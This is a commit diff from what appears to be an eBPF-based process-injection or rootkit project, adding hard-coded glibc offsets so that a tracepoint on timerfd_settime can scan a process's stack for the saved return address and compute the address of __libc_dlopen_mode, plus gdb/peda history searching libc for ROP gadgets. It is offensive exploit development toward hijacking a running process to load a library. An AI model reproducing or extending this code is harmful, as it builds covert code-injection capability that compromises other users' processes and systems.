Included offset and extraction of interesting functions

src/ebpf/include/bpf/injection.h

@@ -12,7 +12,8 @@
 #include "defs.h"
 
 #define OPCODE_JUMP_BYTE_0 0xe8
-#define OPCODES_SYSCALL_CALL 0
+#define GLIBC_OFFSET_MAIN_TO_SYSCALL 0xf00d0
+#define GLIBC_OFFSET_MAIN_TO_DLOPEN 0x12f120
 
 struct sys_timerfd_settime_enter_ctx {
     unsigned long long unused; //Pointer to pt_regs
@@ -57,7 +58,7 @@ static __always_inline int check_syscall_opcodes(__u8* opcodes){
 }   
 
 static __always_inline int stack_extract_return_address_plt(__u64 stack){
-    //We now have a possible call instruction, we check if it starts with the correct format
+    //We have a possible call instruction, we check if it starts with the correct format
     __u8 *op = (__u8*)(stack - 0x5);
     __u8 opcode_arr[5];
     bpf_probe_read(&opcode_arr, 5*sizeof(__u8), op);
@@ -66,7 +67,8 @@ static __always_inline int stack_extract_return_address_plt(__u64 stack){
         return -1;
     }
     
-    //We have localized the call instruction. We proceed to get the offset of the call.
+    //We have localized the call instruction and thus quite probably the saved RIP. 
+    //We proceed to get the offset of the call.
     __u32 offset;
     if(bpf_probe_read_user(&offset, sizeof(__u32), &op[1])<0){
         bpf_printk("Failed to read op[1]\n");
@@ -179,6 +181,9 @@ int sys_enter_timerfd_settime(struct sys_timerfd_settime_enter_ctx *ctx){
     bpf_printk("Timer %i to scan at address %lx\n", fd, scanner);
     #pragma unroll
     for(__u64 ii=0; ii<100; ii++){
+        //We got a foothold in the stack via the syscall argument, now we scan to lower memory
+        //positions assuming those are the saced RIP. We will then perform checks in order to see
+        //if it truly is the saved RIP (checking that there is a path to the actual syscall).
         bpf_probe_read(&address, sizeof(__u64), (void*)scanner - ii);
         //bpf_printk("stack: %lx\n", address);
         if(stack_extract_return_address_plt(address)==0){
@@ -234,7 +239,8 @@ int sys_exit_timerfd_settime(struct sys_timerfd_settime_exit_ctx *ctx){
 
     struct inj_ret_address_data addr = *inj_ret_addr;
     bpf_printk("PID: %u, SYSCALL_ADDR: %lx, STACK_RET_ADDR: %lx", pid, addr.libc_syscall_address, addr.stack_ret_address);
-
+    bpf_printk("Address of libc main: %lx\n", addr.libc_syscall_address - GLIBC_OFFSET_MAIN_TO_SYSCALL);
+    bpf_printk("Address of libc_dlopen_mode: %lx\n", addr.libc_syscall_address - GLIBC_OFFSET_MAIN_TO_SYSCALL + GLIBC_OFFSET_MAIN_TO_DLOPEN);
 
     return 0;
 }

src/helpers/.gdb_history

@@ -114,3 +114,59 @@ si
 ni
 stack 200
 q
+b timerfd_settime
+r
+si
+ni
+d/10i 0x7ffff7d89560
+d/i 0x7ffff7d89560
+disassemble 0x7ffff7d89560
+stack 30ç
+d/6x 7fffffffdcc8
+d/x 7fffffffdcc8
+p/x 7fffffffdcc8
+p/x 0x7fffffffdcc8
+d/x 0x7fffffffdcc8
+d/3x 0x7fffffffdcc8
+d/3x *0x7fffffffdcc8
+x/3x 0x7fffffffdcc8
+x/5i 0x7fffffffdcc8
+x/5x 0x7fffffffdcc8
+x/20x 0x7fffffffdcc8
+stack 
+p __libc_start_main 
+x/x __libc_start_main 
+stack 
+context
+context_code
+x/x __libc_start_main 
+q
+b timerfd_settime
+r
+si
+ni
+x/x __libc_start_main 
+x/x __libc_dlopen_mode
+rop
+ropsearch 0f 
+ropsearch "0f"  
+ropsearch "0f"  libc
+ropsearch "pop %rax" libc
+ropsearch "pop %rax" 
+ropsearch "pop %rax" 
+ropsearch "pop rax" 
+ropsearch "pop rax" libc
+ropsearch "pop eax" libc
+ropgadget 
+ropgadget libc
+help ropgadget
+help ropsearch
+ropsearch "pop eax" libc
+q
+disass main
+l test_time_values_injection 
+disass test_time_values_injection 
+b *(test_time_values_injection + 74)
+r
+si
+q

src/helpers/peda-session-execve_hijack.txt

@@ -1,2 +1,3 @@
 break timerfd_settime
+break timerfd_settime